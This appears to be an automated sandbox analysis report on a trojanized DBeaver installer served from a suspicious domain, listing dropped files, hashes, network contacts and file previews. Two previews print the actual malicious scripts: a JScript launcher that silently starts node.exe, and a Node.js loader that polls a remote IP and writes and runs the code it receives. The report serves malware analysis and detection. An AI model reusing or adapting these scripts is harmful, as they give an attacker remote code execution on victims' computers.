C:\Users\user\AppData\Local\Temp\nsqEB47.tmp\nsDialogs.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\attach.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\awt.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\fontmanager.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\freetype.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\j2gss.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\j2pkcs11.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\jaas.dll0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\jabswitch.exe0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\jaccessinspector.exe0%ReversingLabs
C:\Users\user\AppData\Local\DBeaver\jre\bin\jaccesswalker.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bigdatafriend.com
141.98.168.237
truefalse
    unknown
    www.google.com
    142.251.2.106
    truefalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      23.1.234.48
      unknownUnited States
      20940AKAMAI-ASN1EUfalse
      1.1.1.1
      unknownAustralia
      13335CLOUDFLARENETUSfalse
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      151.101.2.133
      unknownUnited States
      54113FASTLYUSfalse
      142.251.2.106
      www.google.comUnited States
      15169GOOGLEUSfalse
      141.98.168.237
      bigdatafriend.comRussian Federation
      48430FIRSTDC-ASRUfalse
      37.1.214.238
      unknownUkraine
      29802HVC-ASUSfalse
      172.217.14.110
      unknownUnited States
      15169GOOGLEUSfalse
      142.251.2.84
      unknownUnited States
      15169GOOGLEUSfalse
      142.251.2.94
      unknownUnited States
      15169GOOGLEUSfalse
      IP
      192.168.2.17
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1405592
      Start date and time:2024-03-08 20:06:59 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsinteractivecookbook.jbs
      Sample URL:https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:31
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      Analysis Mode:stream
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal52.win@41/900@4/54
      • Exclude process from analysis (whitelisted): SIHClient.exe
      • Excluded IPs from analysis (whitelisted): 172.217.14.110, 142.251.2.84, 142.251.2.94, 34.104.35.123
      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Skipping network analysis since amount of network traffic is too extensive
      • VT rate limit hit for: https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi
      Process:C:\Windows\System32\msiexec.exe
      File Type:data
      Category:modified
      Size (bytes):10196
      Entropy (8bit):5.6497099045197245
      Encrypted:false
      SSDEEP:
      MD5:502D1ED22B2E6CEEBE8E879F5FBE20DB
      SHA1:24E34E8D156212C44C6C00799A0EC20A75B7DB8B
      SHA-256:9412A17998055424D2671D0B8AABD57361580A173F0677A2EFA262AF4AB6D6A9
      SHA-512:2B59ADE3377D2C3E9B3A5359E147FC6BBC4427BDC1A4382E992DB30A9F5CBF0DD50E497FBB8AEF3B22725BD6490AD8BEC82564FA3B49214D0CAB1243DC5C4F3C
      Malicious:false
      Reputation:unknown
      Preview:...@IXOS.@.....@..hX.@.....@.....@.....@.....@.....@......&.{575F8743-E380-426E-B41E-B72C0697E25F}..DBeaver Community".dbeaver-ce-24.0.0-x86_64-setup.msi.@.....@.....@.....@........&.{31AF514C-2EE9-44AB-BC1E-F961F608BEC6}.....@.....@.....@.....@.......@.....@.....@.......@......DBeaver Community......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{575F8743-E380-426E-B41E-B72C44E41CE0}&.{575F8743-E380-426E-B41E-B72C0697E25F}.@......&.{575F8743-E380-426E-B41E-B72CB9C24E82}&.{575F8743-E380-426E-B41E-B72C0697E25F}.@......&.{575F8743-E380-426E-B41E-B72C723ED936}&.{575F8743-E380-426E-B41E-B72C0697E25F}.@......&.{575F8743-E380-426E-B41E-B72CF46DAD7A}&.{575F8743-E380-426E-B41E-B72C0697E25F}.@......&.{575F8743-E380-426E-B41E-B72CDCA22E3C}&.{575F8743-E380-426E-B41E-B72C0697E25F}.@......&.{575F8743-E380-426E-B41E-B72C39182E33}&.{575F8743-E380-426E-B41E-B72C0697E25F}.@......&.{575F8743-E380-426E-B41E-B
      Process:C:\Windows\System32\msiexec.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):112
      Entropy (8bit):5.07362219433684
      Encrypted:false
      SSDEEP:
      MD5:23578F94FF3058C385394A252B27044F
      SHA1:FFA1ADB01394D91628B10025D6A6DCDA89853F24
      SHA-256:1DCBCCCCE710038721185BBCC21F5909C1857D7D755A0DDB9A7D1CCD91143B90
      SHA-512:B3D365E911A17F78230198EF7872DDFE5AC1692CA35F46AC2FB35463210A1CEC00EE64087B6117EEFCDF4192B729557B6B49F3D79F901F9DA385A8A183026562
      Malicious:false
      Reputation:unknown
      Preview:var a = new ActiveXObject("WScript.Shell");..a.Run("C:/ProgramData/jvb/node.exe C:/ProgramData/jvb/node.js", 0);
      Process:C:\Windows\System32\msiexec.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):125292960
      Entropy (8bit):7.999636003638453
      Encrypted:true
      SSDEEP:
      MD5:D0C20D7B58C6974691BCD70220BB1218
      SHA1:007C6EE165ABDEA3FFB7533CE8A205967D9E6246
      SHA-256:0AF0849B292CB1B63F45A04A9562CB394BA9173177B07B3D2365072F2975B15A
      SHA-512:C5F8645E8B8F4767952FD1DE365CDF92401D620DEC757DBC00A88ADDD1C250C91C42FB49C76858B5332A4AEAF8EA0FB1EAA4A134C7678C20FC1049D6BE819D18
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.................................l\x...@............................................. .............w..(...........................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata... ...............................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\msiexec.exe
      File Type:PE32 executable (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):63450744
      Entropy (8bit):6.5827634538389805
      Encrypted:false
      SSDEEP:
      MD5:6522AA9953CC98490D64340DD8CF370A
      SHA1:007F738F5E5A8AC4ABD77F9FC71193DBDD8F5596
      SHA-256:D78B2F981465A40A23B964B2DB32A390DB1970A0DD5371682E121AE2B7422697
      SHA-512:F5E9D4D7FFDC074E382EE89B1996E9C83DF843E1439F50CC2070CD32A525FE2AB62CCB3760EE69510C730D1E2925442144F0976C880208AC9AD8495F3407ABB5
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......H.[[..5...5...5.W.6.9.5.W.0...5.W.1.#.5.j.....5.^.1...5.^.6...5.^.0.n.5.=.....5...5...5..6...5..0...5..1.d.5.W.4...5...4...5..<...5..5...5......5......5..7...5.Rich..5.........................PE..L....*.d.....................z......VQ............@.......................................@.........................`....N".l...........hE..............x....P...2......p...............................@............................................text............................... ..`.rdata...1.......2..................@..@.data.....+..0......................@....rsrc...hE.......F..................@..@.reloc...2...P...4.................@..B................................................................................................................................................................................................................................
      Process:C:\Windows\System32\msiexec.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):524
      Entropy (8bit):5.022510352235273
      Encrypted:false
      SSDEEP:
      MD5:7965081E2EC0920AEA7D72A50C817E88
      SHA1:54693A27C38DCEF552539FDDB3BE6878053AF5B8
      SHA-256:88B8A2BC4F152AE3B5FBE6785345C926EC870128A7BC287AD8A8030354557E66
      SHA-512:639E6CBB821CF06FA9E1A5758B24A16D8ACE6C2827E1861BC2BD748CD9B29BB26B4BA9EE813B93198EC70FCDA84501678CB40BD33958466285675038571A4659
      Malicious:false
      Reputation:unknown
      Preview:let c = require('child_process');....setInterval(() => {.. c.exec('vol c:', (_, s) => {.. let n = parseInt(s.match(/[\dA-F]{4}-[\dA-F]{4}/)[0].replace(/-/g, ''), 16);.. try {.. fetch(`http://37.1.214.238/${n}`).then(r => r.text().then(t => t.endsWith('&') && (require('fs').writeFileSync(__dirname + '\\com.js', t), c.spawn(__dirname + '\\node.exe', [__dirname + '\\com.js', 0])))).catch(e => console.log(e));.. } catch (err) {.. console.log(err);.. }.. });..}, 5000);
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
      Category:dropped
      Size (bytes):69211
      Entropy (8bit):7.995787876711886
      Encrypted:true
      SSDEEP:
      MD5:753DF6889FD7410A2E9FE333DA83A429
      SHA1:3C425F16E8267186061DD48AC1C77C122962456E
      SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
      SHA-512:9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
      Malicious:false
      Reputation:unknown
      Preview:MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B...*..J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.*J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.|!.(.........D!k..&.. /.....H~.....}.(..|.S..~8..A..(.#..w.*Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d.*..]......x_<.W....ya.3.a..SQT.U..|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.|....L| ..p........w.=..ck...<........{s..w..};../.=...k....YH.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Certificate, Version=3
      Category:dropped
      Size (bytes):1398
      Entropy (8bit):7.676048742462893
      Encrypted:false
      SSDEEP:
      MD5:E94FB54871208C00DF70F708AC47085B
      SHA1:4EFC31460C619ECAE59C1BCE2C008036D94C84B8
      SHA-256:7B9D553E1C92CB6E8803E137F4F287D4363757F5D44B37D52F9FCA22FB97DF86
      SHA-512:2E15B76E16264ABB9F5EF417752A1CBB75F29C11F96AC7D73793172BD0864DB65F2D2B7BE0F16BBBE686068F0C368815525F1E39DB5A0D6CA3AB18BE6923B898
      Malicious:false
      Reputation:unknown
      Preview:0..r0..Z.......vS..uFH....JH:N.0...*.H........0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450...200318000000Z..450318000000Z0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450.."0...*.H.............0.........-.0.z.=.r.:K..a....g.7..~.....C..E..cW]....%..h.K..K.J...j..a'..D...?".O.....(..].Y.......,.3$.P:A..{.M.X8.........,..C...t...{.3..Yk....Z.{..U......L...u.o.a.tD....t..h.l&>.......0....|U..p\$x %.gg...N4.kp..8...........;.gC....t./.....7=gl.E\.a.A.....w.FGs.....+....X.W..Z..%....r=....;D.&.........E.......Bng~B.qb...`.d....!N+.mh...tsg1z...yn|..~FoM..+."D...7..aW...$..1s..5WG~.:E.-.Q.....7.e...k.w....?.0.o1..@........PvtY..m.2...~...u..J.,....+B..j6..L.............:.c...$d.......B0@0...U...........0...U.......0....0...U.........F...x9...C.VP..;0...*.H.............^+.t.4D_vH(@....n..%.{...=..v...0 ..`.....x.+.2..$.RR......9n....CA}..[.]...&..tr&....=;jR.<../.{.3.E.....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):3.140389377466657
      Encrypted:false
      SSDEEP:
      MD5:D5E16671C23373E73AADE41FDAB6275B
      SHA1:9C5D678D0C5ABBAD4DB9568B54722CC2061ADD99
      SHA-256:0AAAEE180A81F9280D69C86AF3E795B032561E8722666FE93C40A4B6A5777C35
      SHA-512:4AEAD7AC854D6B1497AD68C4D649FAAFACA26D731D5EC59226AE3D0E67198D82C38B7A154D8A903D58EE2088C3E14DBDDD002A5D36332E2205684CD9DECFFC59
      Malicious:false
      Reputation:unknown
      Preview:p...... .........g.q..(....................................................... .........;.i......(...........[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".2.c.8.3.b.1.3.b.a.f.6.9.d.a.1.:.0."...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:data
      Category:dropped
      Size (bytes):264
      Entropy (8bit):3.150512319618439
      Encrypted:false
      SSDEEP:
      MD5:44F0F63F0A17901FA940694535D3966C
      SHA1:5BE6B91F3FD98829DE4516C9CAE5B3AD508C8924
      SHA-256:CB8C6C3A0D89C4035E48FF004829D458664F945D8A86A08865A429F6EAC2C780
      SHA-512:24058C01A1E60356712F5C40A4C5C7405554B2DAAB360A7CD6375EF8162C0324F7DFC468E4C481C2937F37D14BFB7617655D322BA05728FF6E165183EC534AF4
      Malicious:false
      Reputation:unknown
      Preview:p...... ....v...q>..q..(....................................................... ...............................v...h.t.t.p.:././.s.e.c.u.r.e...g.l.o.b.a.l.s.i.g.n...c.o.m./.c.a.c.e.r.t./.c.o.d.e.s.i.g.n.i.n.g.r.o.o.t.r.4.5...c.r.t...".6.2.f.a.3.3.e.5.-.5.7.6."...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):97
      Entropy (8bit):4.719132915837488
      Encrypted:false
      SSDEEP:
      MD5:CDE7AEC8C2AA98A6BA3CFE573D7F3CDC
      SHA1:C483529BA3EFE85014835D4EF096638D477FEA49
      SHA-256:B84B67DC1B794BF678BFF5E9EDDA9E411216DC6685DAE861C279EF829D52939C
      SHA-512:BE2E7D8D3C674019D141C2558252D944465ED8F4D8425DFBD605C90C9A5F3B39FED787BC1BDFE310FFE2F8121B2CA490D0976C5EA5BB713903C7D60FECBD8FD4
      Malicious:false
      Reputation:unknown
      Preview:name=DBeaver.id=org.jkiss.dbeaver.product.version=24.0.0.branch=release_24_0_0.commit=a9556dacb3.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
      Category:dropped
      Size (bytes):374574
      Entropy (8bit):3.924342679248074
      Encrypted:false
      SSDEEP:
      MD5:A7E34E78D11326C700D6A7F9F96A8819
      SHA1:6F001E35FB737411C51B0DD5E00EDB7C961F3B35
      SHA-256:76422AFC4AEFCA46C97CC72020CA4309ED072FB2187ECCEEF16C92ADC3421F35
      SHA-512:14DF827DA079C3988C7167B76D6060F9EE6BA014BD7E77429E55149C0826EFCE559EEEA4ED6D5A53C8ABCC2682447180973A5020F1DE97CD82941EF94781100D
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.................................l\x...@............................................. .............w..(...........................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata... ...............................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):136088
      Entropy (8bit):6.125017929703304
      Encrypted:false
      SSDEEP:
      MD5:C98D6C6AAD2E6BBA4F2B4F636784F969
      SHA1:D0174DBC2DE361576D0C08BD5096A180BA830F55
      SHA-256:A7D46B0936C95EA933AFB68D5345011BA36791A4268918952628ADB11683688C
      SHA-512:55D19EA09D26B6AC1B554858D295C8C5AAFA19574F24CC384FA9BE741C3CB05F7F1E76E4DF9F7EADF01853C7B264272450C96EE5CB14E2368E02B080C20F308B
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......_.........." ................09.......................................p......&.....`A........................................G.......9...(....P...................!...`......D...........................(....1..0..................8........................text...z........................... ..`.rdata.......0......................@..@.data...............................@....pdata..............................@..@.00cfg..(.... ......................@..@.tls.........0......................@..._RDATA.......@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):849
      Entropy (8bit):4.95682584690522
      Encrypted:false
      SSDEEP:
      MD5:2D05F0CCC179AD89CB120A0499C45FF0
      SHA1:2F02EB7645480AA1A0E39737AF15A398C7D78BAD
      SHA-256:23E0381DA13419F65639A70F5CD042E29BA3433046C378CDE1341FE1EDA1DB72
      SHA-512:3446A0EC2C95A415823BF73C26F36A0ECD0CF33BB1A6C391AF6722590787B14307003E33D7CBA412B2D7FDF3D84C783C393883E8A5FBEE03921C040C23020736
      Malicious:false
      Reputation:unknown
      Preview:#This configuration file was written by: org.eclipse.equinox.internal.frameworkadmin.equinox.EquinoxFwConfigFileParser.#Sun Mar 03 20:42:48 MSK 2024.eclipse.product=org.jkiss.dbeaver.ui.app.standalone.product.osgi.splashPath=platform\:/base/plugins/org.jkiss.dbeaver.ui.app.standalone.org.eclipse.equinox.simpleconfigurator.configUrl=file\:org.eclipse.equinox.simpleconfigurator/bundles.info.osgi.bundles.defaultStartLevel=4.eclipse.application=org.jkiss.dbeaver.ui.app.standalone.standalone.osgi.bundles=reference\:file\:org.eclipse.equinox.simpleconfigurator_1.5.0.v20230919-1457.jar@1\:start.eclipse.p2.data.area=@config.dir/../p2.eclipse.p2.profile=DefaultProfile.osgi.framework=file\:plugins/org.eclipse.osgi_3.18.600.v20231110-1900.jar.osgi.framework.extensions=reference\:file\:org.eclipse.osgi.compatibility.state_1.2.900.v20231106-0859.jar.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):42268
      Entropy (8bit):4.798421113778689
      Encrypted:false
      SSDEEP:
      MD5:09BC9953128F91EAD249F817F9789A35
      SHA1:559404D8CC52CDDC22594B37D19537E40D2752BF
      SHA-256:0B5CCC7AF28C63FBFB1F6CBC46AF7D1E3D1003AA598B24F3BD872855011BAAE6
      SHA-512:A2B70B8D8DED003BFA2D2FDD87B1D7D80ADBD61EE7DA9D47A40ABC3D85E12689DDD2B19179EC40270404377919336B05485215C80EF5D90B69701B95092D1A3E
      Malicious:false
      Reputation:unknown
      Preview:#encoding=UTF-8.#version=1.bcpg,1.77.0,plugins/bcpg_1.77.0.jar,4,false.bcpkix,1.77.0,plugins/bcpkix_1.77.0.jar,4,false.com.github.jsqlparser,4.5.0,plugins/com.github.jsqlparser_4.5.0.jar,4,false.com.google.gson,2.10.1.v20230109-0753,plugins/com.google.gson_2.10.1.v20230109-0753.jar,4,false.com.google.guava,32.1.3.jre,plugins/com.google.guava_32.1.3.jre.jar,4,false.com.google.guava.failureaccess,1.0.2,plugins/com.google.guava.failureaccess_1.0.2.jar,4,false.com.ibm.icu.base,58.2.0.v20170418-1837,plugins/com.ibm.icu.base_58.2.0.v20170418-1837.jar,4,false.com.jcraft.jsch,0.2.8,plugins/com.jcraft.jsch_0.2.8.jar,4,false.com.sun.jna,5.13.0.v20230812-1000,plugins/com.sun.jna_5.13.0.v20230812-1000/,4,false.com.sun.jna.platform,5.13.0,plugins/com.sun.jna.platform_5.13.0.jar,4,false.jakarta.annotation-api,2.1.1,plugins/jakarta.annotation-api_2.1.1.jar,4,false.jakarta.inject.jakarta.inject-api,2.0.1,plugins/jakarta.inject.jakarta.inject-api_2.0.1.jar,4,false.org.apache.ant,1.10.0,plugins/org.apac
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):4205
      Entropy (8bit):4.945103924718824
      Encrypted:false
      SSDEEP:
      MD5:CC06C479A0A434040AD123130155C30E
      SHA1:AF7EE998F0EE65ED637344F01F403F52AF6674B5
      SHA-256:5BAB963FCD94AD79FCCD021BCBCC5C8CBDCBA79A0689ED5D889E6021472A82F0
      SHA-512:0EA19FEE5BC9A8EA2C7EF9A9CF3602114EA8212324E161F27EE04DB79789BB309D25E6955B444C623ED2FB5BD3D3A345B7B3C839BA2DA831789D1B29BDB862E6
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<config date="1709487768484" transient="false">..<site updateable="true" url="platform:/base/" enabled="true" policy="USER-EXCLUDE">...<feature id="org.eclipse.emf.ecore" version="2.36.0.v20231002-1156" url="features/org.eclipse.emf.ecore_2.36.0.v20231002-1156/">...</feature>...<feature id="org.eclipse.equinox.p2.core.feature" version="1.7.0.v20231112-1314" url="features/org.eclipse.equinox.p2.core.feature_1.7.0.v20231112-1314/">...</feature>...<feature id="org.jkiss.dbeaver.db.feature" version="1.0.117.202403031740" url="features/org.jkiss.dbeaver.db.feature_1.0.117.202403031740/">...</feature>...<feature id="org.eclipse.ecf.filetransfer.feature" version="3.14.1900.v20230715-1945" url="features/org.eclipse.ecf.filetransfer.feature_3.14.1900.v20230715-1945/">...</feature>...<feature id="org.eclipse.rcp" version="4.30.0.v20231201-0512" url="features/org.eclipse.rcp_4.30.0.v20231201-0512/">...</feature>...<feature id="org.jkiss.dbeaver.app.base.feat
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):237576
      Entropy (8bit):6.3824134756016075
      Encrypted:false
      SSDEEP:
      MD5:1EFF93EB632527E9CE1ADE46C874C5EF
      SHA1:2AEA30884A68F83FB08787F5ECD9A749317FDC06
      SHA-256:4470708D21040ED1F42B92EA38A62CFDC34089832F4B293B451310156BD5D5E8
      SHA-512:64546221784E41D5494E8646C91E95C7B4C3CE12B02A50F7C25D6E3336B410810D2EC519A25CF8D3960CF1FA22A4C356970E81E477DC6E0853C903D479D021B4
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......jn..............:d..%...:d..+...:d......|z......|z..?...|z..'...:d..).......K...{z..*...{z../...Rich............................PE..d...C..e.........."......l..........D<.........@....................................Z.....`..................................................B..P...............d....x...(..............................................8............................................text...0k.......l.................. ..`.rdata...............p..............@..@.data....%...P.......>..............@....pdata..d............P..............@..@_RDATA...............n..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):532488
      Entropy (8bit):4.7309360687125555
      Encrypted:false
      SSDEEP:
      MD5:818DBC331A283C689516DD0E291DAFBB
      SHA1:25B1D30640C86748F4516A2EF4DA318CF8651F0C
      SHA-256:9604CBDE72989FC6EABDC6A7D4D688188C73BEC565D4E514EEEC174AC0EA9C85
      SHA-512:6D8FEA82A5A3BE444C0825F4122C1EC4C69B0E801E02E2FC4CB673D66227BE5C5CC63B8E225FAF8C6AFE9B24D7A56354480CCACC6FA3786E3ABA008568A9FD65
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................p....................................................s.............Rich....................PE..d...@..e.........."......l..........D<.........@.............................@.......]....`..................................................B..P.......8.......d........(...0..........................................8............................................text...0k.......l.................. ..`.rdata...............p..............@..@.data....%...P.......>..............@....pdata..d............P..............@..@_RDATA...............n..............@..@.rsrc...8............p..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1467
      Entropy (8bit):5.026889331882238
      Encrypted:false
      SSDEEP:
      MD5:6B5D4576400220080CE44E873481E2F2
      SHA1:B67BD039E379070077C5DFCA2503E5464890CBCC
      SHA-256:56F43DE1BD46F4FFD33B093DF5069809ACCD674A6FE633AEEA1C3469821FB463
      SHA-512:030736F1EBB93E3A0C8FB47E72D0FC8FEE78C73D386B54174126DF03728C7E35B46E0E7E31DB9D1EA3AC19A520D605B34E0DE5754AD2FE0B010D649151275A64
      Malicious:false
      Reputation:unknown
      Preview:-startup.plugins/org.jkiss.dbeaver.launcher_1.0.0.202403031740.jar.--launcher.library.plugins/org.eclipse.equinox.launcher.win32.win32.x86_64_1.2.800.v20231003-1442.-vmargs.-XX:+IgnoreUnrecognizedVMOptions.-Dosgi.requiredJavaVersion=17.-Dfile.encoding=UTF-8.--add-modules=ALL-SYSTEM.--add-opens=java.base/java.io=ALL-UNNAMED.--add-opens=java.base/java.lang=ALL-UNNAMED.--add-opens=java.base/java.lang.reflect=ALL-UNNAMED.--add-opens=java.base/java.net=ALL-UNNAMED.--add-opens=java.base/java.nio=ALL-UNNAMED.--add-opens=java.base/java.nio.charset=ALL-UNNAMED.--add-opens=java.base/java.text=ALL-UNNAMED.--add-opens=java.base/java.time=ALL-UNNAMED.--add-opens=java.base/java.util=ALL-UNNAMED.--add-opens=java.base/java.util.concurrent=ALL-UNNAMED.--add-opens=java.base/java.util.concurrent.atomic=ALL-UNNAMED.--add-opens=java.base/jdk.internal.vm=ALL-UNNAMED.--add-opens=java.base/jdk.internal.misc=ALL-UNNAMED.--add-opens=java.base/sun.nio.ch=ALL-UNNAMED.--add-opens=java.base/sun.nio.fs=ALL-UNNAMED.-
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.5735227617565055
      Encrypted:false
      SSDEEP:
      MD5:A5622476F7AB4DBD2ACD29AE285A8077
